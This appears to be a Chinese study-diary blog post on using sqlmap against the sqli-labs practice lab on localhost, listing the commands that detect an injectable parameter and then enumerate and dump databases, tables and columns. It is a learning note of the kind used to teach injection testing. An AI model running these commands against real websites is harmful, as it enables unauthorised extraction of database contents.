2019-07-18

第六天

SQLmap注入

SQLmap安装

https://blog.csdn.net/zhongcui8067/article/details/80439934

SQLmap使用

检查检测此url是否存在注入漏洞。

代码>python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1

得出结论可以注入

查询数据库名

>python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --dbs

通过已知数据库名查询数据表名

代码>python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --tables

通过数据表名查询列名

代码>python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D challenges -T ozqwr9tg21 --columns

获取字段值

代码>python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D challenges -T ozqwr9tg21 -C id --dump

-U +需要注入的网页地址

-D +数据库名字

-T +数据表名字

-C +列名

常用参数意思:https://www.cnblogs.com/insane-Mr-Li/p/10150165.html

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 现代诗:赏《追寻一个梦》之感慨
    文/匡宗贵 如果心中梦 藏在诗海 我就会顺风起航 游遍大江南北 吟成格律新曲 装满整个行囊 如果心中梦 飞出行囊 ...
    艾思阅读 6,861评论 46 65
  • 你点开看看,就一点文字
    我总是喜欢一边吃着西瓜一边思考人生,结果吃到了立秋,人生也没有思考出来 我总是习惯一边抽着烟一边思考人生,结果抽到...
    青春的路阅读 1,657评论 1 0
  • 你有一句什么要讲  我听
    2016是沉甸甸的,其中的内容就像杯子里的水,一直加一直加,满得快要溢出来。什么味道都有的一年。这样回复完清水小姐...
    瞎唱假写阅读 1,878评论 0 1